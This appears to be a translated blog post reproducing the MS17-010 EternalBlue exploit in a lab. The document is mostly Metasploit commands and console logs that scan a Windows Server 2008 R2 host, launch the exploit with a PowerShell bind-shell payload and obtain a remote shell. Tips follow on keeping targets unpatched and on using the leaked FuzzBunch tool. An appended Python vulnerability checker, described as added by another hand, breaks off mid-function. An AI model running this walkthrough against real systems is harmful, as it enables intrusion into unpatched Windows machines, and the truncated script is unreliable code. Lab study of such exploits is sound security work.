Internal network penetration: reproducing MS17-010

Published 2023-06-02 07:57:33  Author: 熊猫爱旅行
title: Internal network penetration: reproducing MS17-010
date: 2022-02-06T20:27:52Z
lastmod: 2022-02-09T09:52:22Z
tags: [MS17-010,metasploit,kali,445]


I. Lab environment

  1. Attacker host

OS Name: kali2020

Metasploit Framework: msf6

IP: 192.168.31.53

  2. Target machine

OS Name: Microsoft Windows Server 2008 R2 Datacenter (en)

OS Version: 6.1.7600 N/A Build 7600

IP: 192.168.31.156

Note: the choice of target image has a large effect on the outcome. During this reproduction I tried Windows7-pro-x64-cn, Windows7-home-x64-cn, Windows7-pro-sp1-x64-en, Windows7-pro-x64-en, Windows7-pro-x86-en and Windows Server 2008 R2; only Microsoft Windows Server 2008 R2 Datacenter (en) succeeded, and the other targets failed with:

"Exploit completed, but no session was created."

II. Reproduction steps

(1) Target setup

  1. Create a new VM in VMware Workstation with its network in bridged mode; size memory and CPU to what your machine allows;
  2. After boot, either the Private or the Public network profile works: with Private, the exploit succeeds even with the firewall enabled; with Public, the firewall must be turned off (the Public profile blocks inbound file and printer sharing, i.e. port 445, by default). Turning the firewall off is recommended to improve the success rate;
  3. Confirm the target's IP address, then ping it from the attacker host to verify connectivity;
C:\Windows\system32> ipconfig
  4. Port 445 is open by default, so no further configuration is needed.

(2) Attacker host: kali2020

  1. Open a terminal and scan the target IP with nmap; barring surprises, port 445 shows up as open in the results;
nmap 192.168.31.156

Scan result:

Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-16 23:13 CST
Nmap scan report for 192.168.31.156
Host is up (0.022s latency).
Not shown: 990 closed tcp ports (reset)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
10243/tcp open  unknown
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49158/tcp open  unknown
  2. Time to get to work: start the Metasploit Framework
$ msfconsole
  3. Search for the MS17-010 modules
msf6 > search ms17-010

Search result:

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution
  4. Run the auxiliary scanner first to see whether the target is actually vulnerable

Commands:

msf6 > use auxiliary/scanner/smb/smb_ms17_010    // or simply: use 3
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhost 192.168.31.156      // target IP
rhost => 192.168.31.156
msf6 auxiliary(scanner/smb/smb_ms17_010) > run           // execute with run

Scan result:

[+] 192.168.31.156:445    - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Datacenter 7600 x64 (64-bit)
[*] 192.168.31.156:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
// "Host is likely VULNERABLE to MS17-010!" means the check found the host unpatched, so the exploit is likely to work; a patched host reports "does NOT appear vulnerable" instead
  5. Switch to the ms17_010_eternalblue module and get to work
msf6 auxiliary(scanner/smb/smb_ms17_010) > use 0     // same as: use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp            // the default payload is windows/x64/meterpreter/reverse_tcp; ms17_010_eternalblue is the exploit module, the payload is what runs once it succeeds
msf6 exploit(windows/smb/ms17_010_eternalblue) > show payloads       // list every compatible payload

Compatible Payloads
===================

   #   Name                                                Disclosure Date  Rank    Check  Description
   -   ----                                                ---------------  ----    -----  -----------
   0   payload/generic/custom                                               normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                                       normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                                    normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/generic/ssh/interact                                         normal  No     Interact with Established SSH Connection
   4   payload/windows/x64/exec                                             normal  No     Windows x64 Execute Command
   5   payload/windows/x64/loadlibrary                                      normal  No     Windows x64 LoadLibrary Path
   6   payload/windows/x64/messagebox                                       normal  No     Windows MessageBox x64
   7   payload/windows/x64/meterpreter/bind_ipv6_tcp                        normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
   8   payload/windows/x64/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
   9   payload/windows/x64/meterpreter/bind_named_pipe                      normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager
   10  payload/windows/x64/meterpreter/bind_tcp                             normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
   11  payload/windows/x64/meterpreter/bind_tcp_rc4                         normal  No     Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   12  payload/windows/x64/meterpreter/bind_tcp_uuid                        normal  No     Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)
   13  payload/windows/x64/meterpreter/reverse_http                         normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
   14  payload/windows/x64/meterpreter/reverse_https                        normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
   15  payload/windows/x64/meterpreter/reverse_named_pipe                   normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
   16  payload/windows/x64/meterpreter/reverse_tcp                          normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
   17  payload/windows/x64/meterpreter/reverse_tcp_rc4                      normal  No     Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   18  payload/windows/x64/meterpreter/reverse_tcp_uuid                     normal  No     Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
   19  payload/windows/x64/meterpreter/reverse_winhttp                      normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
   20  payload/windows/x64/meterpreter/reverse_winhttps                     normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
   21  payload/windows/x64/peinject/bind_ipv6_tcp                           normal  No     Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager
   22  payload/windows/x64/peinject/bind_ipv6_tcp_uuid                      normal  No     Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager with UUID Support
   23  payload/windows/x64/peinject/bind_named_pipe                         normal  No     Windows Inject Reflective PE Files, Windows x64 Bind Named Pipe Stager
   24  payload/windows/x64/peinject/bind_tcp                                normal  No     Windows Inject Reflective PE Files, Windows x64 Bind TCP Stager
   25  payload/windows/x64/peinject/bind_tcp_rc4                            normal  No     Windows Inject Reflective PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   26  payload/windows/x64/peinject/bind_tcp_uuid                           normal  No     Windows Inject Reflective PE Files, Bind TCP Stager with UUID Support (Windows x64)
   27  payload/windows/x64/peinject/reverse_named_pipe                      normal  No     Windows Inject Reflective PE Files, Windows x64 Reverse Named Pipe (SMB) Stager
   28  payload/windows/x64/peinject/reverse_tcp                             normal  No     Windows Inject Reflective PE Files, Windows x64 Reverse TCP Stager
   29  payload/windows/x64/peinject/reverse_tcp_rc4                         normal  No     Windows Inject Reflective PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   30  payload/windows/x64/peinject/reverse_tcp_uuid                        normal  No     Windows Inject Reflective PE Files, Reverse TCP Stager with UUID Support (Windows x64)
   31  payload/windows/x64/pingback_reverse_tcp                             normal  No     Windows x64 Pingback, Reverse TCP Inline
   32  payload/windows/x64/powershell_bind_tcp                              normal  No     Windows Interactive Powershell Session, Bind TCP
   33  payload/windows/x64/powershell_reverse_tcp                           normal  No     Windows Interactive Powershell Session, Reverse TCP
   34  payload/windows/x64/powershell_reverse_tcp_ssl                       normal  No     Windows Interactive Powershell Session, Reverse TCP SSL
   35  payload/windows/x64/shell/bind_ipv6_tcp                              normal  No     Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
   36  payload/windows/x64/shell/bind_ipv6_tcp_uuid                         normal  No     Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
   37  payload/windows/x64/shell/bind_named_pipe                            normal  No     Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager
   38  payload/windows/x64/shell/bind_tcp                                   normal  No     Windows x64 Command Shell, Windows x64 Bind TCP Stager
   39  payload/windows/x64/shell/bind_tcp_rc4                               normal  No     Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   40  payload/windows/x64/shell/bind_tcp_uuid                              normal  No     Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
   41  payload/windows/x64/shell/reverse_tcp                                normal  No     Windows x64 Command Shell, Windows x64 Reverse TCP Stager
   42  payload/windows/x64/shell/reverse_tcp_rc4                            normal  No     Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   43  payload/windows/x64/shell/reverse_tcp_uuid                           normal  No     Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
   44  payload/windows/x64/shell_bind_tcp                                   normal  No     Windows x64 Command Shell, Bind TCP Inline
   45  payload/windows/x64/shell_reverse_tcp                                normal  No     Windows x64 Command Shell, Reverse TCP Inline
   46  payload/windows/x64/vncinject/bind_ipv6_tcp                          normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager
   47  payload/windows/x64/vncinject/bind_ipv6_tcp_uuid                     normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support
   48  payload/windows/x64/vncinject/bind_named_pipe                        normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager
   49  payload/windows/x64/vncinject/bind_tcp                               normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
   50  payload/windows/x64/vncinject/bind_tcp_rc4                           normal  No     Windows x64 VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   51  payload/windows/x64/vncinject/bind_tcp_uuid                          normal  No     Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)
   52  payload/windows/x64/vncinject/reverse_http                           normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
   53  payload/windows/x64/vncinject/reverse_https                          normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
   54  payload/windows/x64/vncinject/reverse_tcp                            normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
   55  payload/windows/x64/vncinject/reverse_tcp_rc4                        normal  No     Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   56  payload/windows/x64/vncinject/reverse_tcp_uuid                       normal  No     Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
   57  payload/windows/x64/vncinject/reverse_winhttp                        normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
   58  payload/windows/x64/vncinject/reverse_winhttps                       normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)
  6. Set the target IP and the payload. I used "32 payload/windows/x64/powershell_bind_tcp". The payload choice is not unique: I tried several reverse-shell payloads and only number 32 worked, the others failed with the errors below, so switch payloads if one does not work
Exploit completed, but no session was created.

Command shell session 3 closed.

Commands:

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.31.156
rhost => 192.168.31.156
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload 32
payload => windows/x64/powershell_bind_tcp
  7. Review the remaining options; anything marked Required = yes must be set;

    msf6 exploit(windows/smb/ms17_010_eternalblue) > show options 
    
    Module options (exploit/windows/smb/ms17_010_eternalblue):
    
       Name           Current Setting  Required  Description
       ----           ---------------  --------  -----------
       RHOSTS         192.168.31.156   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
       RPORT          445              yes       The target port (TCP)
       SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2,
                                                  Windows 7, Windows Embedded Standard 7 target machines.
       SMBPass                         no        (Optional) The password for the specified username
       SMBUser                         no        (Optional) The username to authenticate as
       VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Win
                                                 dows 7, Windows Embedded Standard 7 target machines.
       VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Wi
                                                 ndows Embedded Standard 7 target machines.
    
    
    Payload options (windows/x64/powershell_reverse_tcp):
    
       Name          Current Setting  Required  Description
       ----          ---------------  --------  -----------
       EXITFUNC      thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
       LHOST         192.168.31.53    yes       The listen address (an interface may be specified)
       LOAD_MODULES                   no        A list of powershell modules separated by a comma to download over the web
       LPORT         4444             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic Target
    
  8. The target has not been set explicitly; the default "0 Automatic Target" works, but to raise the success rate it can be pinned. LPORT is the port used for the shell and can be set freely; here I set it to 10243. Note that the show options output above was captured with windows/x64/powershell_reverse_tcp, where LHOST and LPORT describe the attacker's listener; with the bind payload actually used for the run below (windows/x64/powershell_bind_tcp) there is no LHOST, and LPORT is the port the payload opens on the target and that the attacker then connects to, so it must be reachable through the target's firewall;

    msf6 exploit(windows/smb/ms17_010_eternalblue) > show targets       // list every available target
    
    Exploit targets:
    
       Id  Name
       --  ----
       0   Automatic Target
       1   Windows 7
       2   Windows Embedded Standard 7
       3   Windows Server 2008 R2
       4   Windows 8
       5   Windows 8.1
       6   Windows Server 2012
       7   Windows 10 Pro
       8   Windows 10 Enterprise Evaluation
    msf6 exploit(windows/smb/ms17_010_eternalblue) > set target 3        // pin the target to Windows Server 2008 R2
    target => 3
    msf6 exploit(windows/smb/ms17_010_eternalblue) > set lport 10243
    lport => 10243
    
  9. The moment of truth: success or failure is decided here

msf6 exploit(windows/smb/ms17_010_eternalblue) > run

Result:

msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] 192.168.31.156:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.31.156:445    - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Datacenter 7600 x64 (64-bit)
[*] 192.168.31.156:445    - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.31.156:445 - The target is vulnerable.
[*] 192.168.31.156:445 - Connecting to target for exploitation.
[+] 192.168.31.156:445 - Connection established for exploitation.
[+] 192.168.31.156:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.31.156:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.31.156:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 192.168.31.156:445 - 0x00000010  30 30 38 20 52 32 20 44 61 74 61 63 65 6e 74 65  008 R2 Datacente
[*] 192.168.31.156:445 - 0x00000020  72 20 37 36 30 30                                r 7600      
[+] 192.168.31.156:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.31.156:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.31.156:445 - Sending all but last fragment of exploit packet
[*] 192.168.31.156:445 - Starting non-paged pool grooming
[+] 192.168.31.156:445 - Sending SMBv2 buffers
[+] 192.168.31.156:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.31.156:445 - Sending final SMBv2 buffers.
[*] 192.168.31.156:445 - Sending last fragment of exploit packet!
[*] 192.168.31.156:445 - Receiving response from exploit packet
[+] 192.168.31.156:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.31.156:445 - Sending egg to corrupted connection.
[*] 192.168.31.156:445 - Triggering free of corrupted buffer.
[*] Started bind TCP handler against 192.168.31.156:10243
[*] Powershell session session 1 opened (192.168.31.53:45757 -> 192.168.31.156:10243 ) at 2022-01-17 00:13:44 +0800
[+] 192.168.31.156:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.31.156:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.31.156:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
PS C:\Windows\system32> 
PS C:\Windows\system32> ipconfig        // confirm the IP address of the compromised target

Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::b15b:c4d6:7df1:a737%11
   IPv4 Address. . . . . . . . . . . : 192.168.31.156
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.31.1

Tunnel adapter isatap.{3C95E970-9F5F-4645-86BE-335848A6C11C}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
PS C:\Windows\system32> 
  10. When the WIN banner and the "PS C:\Windows\system32>" prompt appear, the exploit succeeded and post-exploitation can begin!

The result may also look like this: a few FAILs before the WIN. Don't panic; the module retries on its own, raising the number of groom allocations (12, then 17, then 22 below) each time.

msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] 192.168.31.156:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.31.156:445    - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Datacenter 7600 x64 (64-bit)
[*] 192.168.31.156:445    - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.31.156:445 - The target is vulnerable.
[*] 192.168.31.156:445 - Connecting to target for exploitation.
[+] 192.168.31.156:445 - Connection established for exploitation.
[+] 192.168.31.156:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.31.156:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.31.156:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 192.168.31.156:445 - 0x00000010  30 30 38 20 52 32 20 44 61 74 61 63 65 6e 74 65  008 R2 Datacente
[*] 192.168.31.156:445 - 0x00000020  72 20 37 36 30 30                                r 7600      
[+] 192.168.31.156:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.31.156:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.31.156:445 - Sending all but last fragment of exploit packet
[*] 192.168.31.156:445 - Starting non-paged pool grooming
[+] 192.168.31.156:445 - Sending SMBv2 buffers
[+] 192.168.31.156:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.31.156:445 - Sending final SMBv2 buffers.
[*] 192.168.31.156:445 - Sending last fragment of exploit packet!
[*] 192.168.31.156:445 - Receiving response from exploit packet
[+] 192.168.31.156:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.31.156:445 - Sending egg to corrupted connection.
[*] 192.168.31.156:445 - Triggering free of corrupted buffer.
[*] Started bind TCP handler against 192.168.31.156:10243
[-] 192.168.31.156:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.31.156:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.31.156:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.31.156:445 - Connecting to target for exploitation.
[+] 192.168.31.156:445 - Connection established for exploitation.
[+] 192.168.31.156:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.31.156:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.31.156:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 192.168.31.156:445 - 0x00000010  30 30 38 20 52 32 20 44 61 74 61 63 65 6e 74 65  008 R2 Datacente
[*] 192.168.31.156:445 - 0x00000020  72 20 37 36 30 30                                r 7600      
[+] 192.168.31.156:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.31.156:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.31.156:445 - Sending all but last fragment of exploit packet
[*] 192.168.31.156:445 - Starting non-paged pool grooming
[+] 192.168.31.156:445 - Sending SMBv2 buffers
[+] 192.168.31.156:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.31.156:445 - Sending final SMBv2 buffers.
[*] 192.168.31.156:445 - Sending last fragment of exploit packet!
[*] 192.168.31.156:445 - Receiving response from exploit packet
[+] 192.168.31.156:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.31.156:445 - Sending egg to corrupted connection.
[*] 192.168.31.156:445 - Triggering free of corrupted buffer.
[-] 192.168.31.156:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.31.156:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.31.156:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.31.156:445 - Connecting to target for exploitation.
[+] 192.168.31.156:445 - Connection established for exploitation.
[+] 192.168.31.156:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.31.156:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.31.156:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 192.168.31.156:445 - 0x00000010  30 30 38 20 52 32 20 44 61 74 61 63 65 6e 74 65  008 R2 Datacente
[*] 192.168.31.156:445 - 0x00000020  72 20 37 36 30 30                                r 7600      
[+] 192.168.31.156:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.31.156:445 - Trying exploit with 22 Groom Allocations.
[*] 192.168.31.156:445 - Sending all but last fragment of exploit packet
[*] 192.168.31.156:445 - Starting non-paged pool grooming
[+] 192.168.31.156:445 - Sending SMBv2 buffers
[+] 192.168.31.156:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.31.156:445 - Sending final SMBv2 buffers.
[*] 192.168.31.156:445 - Sending last fragment of exploit packet!
[*] 192.168.31.156:445 - Receiving response from exploit packet
[+] 192.168.31.156:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.31.156:445 - Sending egg to corrupted connection.
[*] 192.168.31.156:445 - Triggering free of corrupted buffer.
[*] Powershell session session 3 opened (192.168.31.53:34929 -> 192.168.31.156:10243 ) at 2022-01-16 19:56:59 +0800
[+] 192.168.31.156:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.31.156:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.31.156:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

PS C:\Windows\system32> 

III. Notes after the reproduction

This reproduction took me two full days, and the error I ran into most often was:

Exploit completed, but no session was created.

To solve it I read many blog posts and formed some understanding of my own; below I summarize the methods found online together with my own experience:

  1. Some payloads support Chinese-language Windows 7 poorly; use an English-language Windows 7 or try other payloads;
  2. The downloaded target image may be too recent, with the vulnerability already fixed and nothing left to exploit; use a release from 2009 or one from before 2017 (the MS17-010 fix shipped in March 2017, so any image that includes updates from then on is not exploitable, and Windows Update must stay off on the target);
  3. Firewall interference, including the physical host's firewall, the router's firewall, the target's firewall and the attacker host's firewall. In my own practice, with the VM network in bridged mode only the target's firewall affected the result;
  4. The MS17-010 modules built into Metasploit are not very stable and the session often dies right after being created; the original fb.py (the FuzzBunch launcher from the Shadow Brokers leak) is recommended instead, see

内网渗透之ms17-010; the reference it cites, "Metasploit 「永恒之蓝」两种模块的利弊", is a dead link, and the new link is Metasploit 「永恒之蓝」两种模块的利弊

  5. Run run or exploit several times.
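Before spending days on "Exploit completed, but no session was created", it helps to run the same probe the smb_ms17_010 scanner from step 4 performs, but by hand, so that the answer separates the cases in the troubleshooting list above: patched host, host that never speaks SMBv1 (EternalBlue cannot work without it), host that refuses anonymous IPC$ sessions, and host that is simply unreachable on 445. The script below is an added example written for this page, not code from the original post or from Metasploit, and it uses only the Python standard library. It negotiates the NT LM 0.12 dialect, opens a null session, connects to IPC$ and sends a SMB_COM_TRANSACTION PeekNamedPipe against FID 0: an unpatched server answers STATUS_INSUFF_SERVER_RESOURCES (0xC0000205), a patched one STATUS_ACCESS_DENIED or STATUS_INVALID_HANDLE. The ASCII, non-extended-security negotiation flags, the verdict strings and the two sample replies at the bottom are my own choices and constructed data, not captures from the author's lab; the default target address is the post's 192.168.31.156.

```python
import socket
import struct

# NT status values the verdict is keyed on (the same ones the Metasploit scanner tests)
STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205  # unpatched: the bogus request reaches the buggy path
STATUS_ACCESS_DENIED = 0xC0000022            # patched: bogus FID 0 is rejected
STATUS_INVALID_HANDLE = 0xC0000008           # patched: bogus FID 0 is rejected

SMB_COM_TRANSACTION, SMB_COM_NEGOTIATE = 0x25, 0x72
SMB_COM_SESSION_SETUP_ANDX, SMB_COM_TREE_CONNECT_ANDX = 0x73, 0x75
TRANS_PEEK_NAMED_PIPE = 0x23

def smb_header(command, tid=0, uid=0, status=0):
    # 32-byte SMBv1 header. Flags2 0x4001 = NT status + long names: ASCII strings and no
    # extended security, so the null session below needs no NTLMSSP blob (an assumption).
    return struct.pack("<4sBIBHH8sHHHHH", b"\xffSMB", command, status, 0x18, 0x4001,
                       0, b"\x00" * 8, 0, tid, 0xFEFF, uid, 1)

def build_negotiate():
    dialects = b"\x02NT LM 0.12\x00"  # offer only the SMBv1 dialect EternalBlue relies on
    return smb_header(SMB_COM_NEGOTIATE) + b"\x00" + struct.pack("<H", len(dialects)) + dialects

def build_session_setup():
    # Null session, 13 words: AndX, MaxBuffer 4356, MaxMpx 10, VC 0, SessionKey 0, zero-length
    # OEM/Unicode passwords, reserved, caps NT_SMBS|STATUS32; then four empty NUL strings.
    words = struct.pack("<BBHHHHIHHII", 0xFF, 0, 0, 4356, 10, 0, 0, 0, 0, 0, 0x50)
    return smb_header(SMB_COM_SESSION_SETUP_ANDX) + b"\x0d" + words + struct.pack("<H", 4) + b"\x00" * 4

def build_tree_connect(host, uid):
    # Attach the null session to \\host\IPC$ (password = one NUL byte, service "?????")
    words = struct.pack("<BBHHH", 0xFF, 0, 0, 0, 1)
    data = b"\x00" + ("\\\\%s\\IPC$" % host).encode() + b"\x00?????\x00"
    return smb_header(SMB_COM_TREE_CONNECT_ANDX, uid=uid) + b"\x04" + words + struct.pack("<H", len(data)) + data

def build_peek_named_pipe(tid, uid):
    # SMB_COM_TRANSACTION, 16 words, SetupCount 2 with Setup = [PeekNamedPipe, FID 0],
    # no parameters and no data; both offsets point just past the "\PIPE\" name.
    name = b"\\PIPE\\\x00"
    offset = 32 + 1 + 32 + 2 + len(name)
    words = struct.pack("<HHHHBBHIHHHHHBBHH", 0, 0, 0xFFFF, 0xFFFF, 0, 0, 0, 0, 0,
                        0, offset, 0, offset, 2, 0, TRANS_PEEK_NAMED_PIPE, 0)
    return smb_header(SMB_COM_TRANSACTION, tid, uid) + b"\x10" + words + struct.pack("<H", len(name)) + name

def nt_status(reply):
    if reply[:4] != b"\xffSMB":
        raise ValueError("not an SMBv1 reply (SMBv1 disabled, or not a Windows SMB server?)")
    return struct.unpack_from("<I", reply, 5)[0]

def native_os(session_setup_reply):
    # NativeOS string of the Session Setup AndX reply (ASCII, since Unicode was not negotiated)
    start = 32 + 1 + session_setup_reply[32] * 2 + 2  # header, WordCount, words, ByteCount
    return session_setup_reply[start:].split(b"\x00")[0].decode("latin-1")

def classify(status):
    if status == STATUS_INSUFF_SERVER_RESOURCES:
        return "likely VULNERABLE"
    if status in (STATUS_ACCESS_DENIED, STATUS_INVALID_HANDLE):
        return "likely patched"
    return "undetermined (0x%08X)" % status

def exchange(sock, smb):
    # One request/reply over the NetBIOS session service (4-byte length prefix, type 0)
    sock.sendall(struct.pack(">I", len(smb)) + smb)
    nb = sock.recv(4)
    if len(nb) < 4:
        raise ConnectionError("target closed the connection (SMBv1 disabled or filtered?)")
    want, data = struct.unpack(">I", nb)[0] & 0xFFFFFF, b""
    while len(data) < want:
        chunk = sock.recv(want - len(data))
        if not chunk:
            break
        data += chunk
    return data

def check(host, port=445, timeout=5.0):
    with socket.create_connection((host, port), timeout=timeout) as s:
        if nt_status(exchange(s, build_negotiate())) != 0:
            return "negotiate failed"
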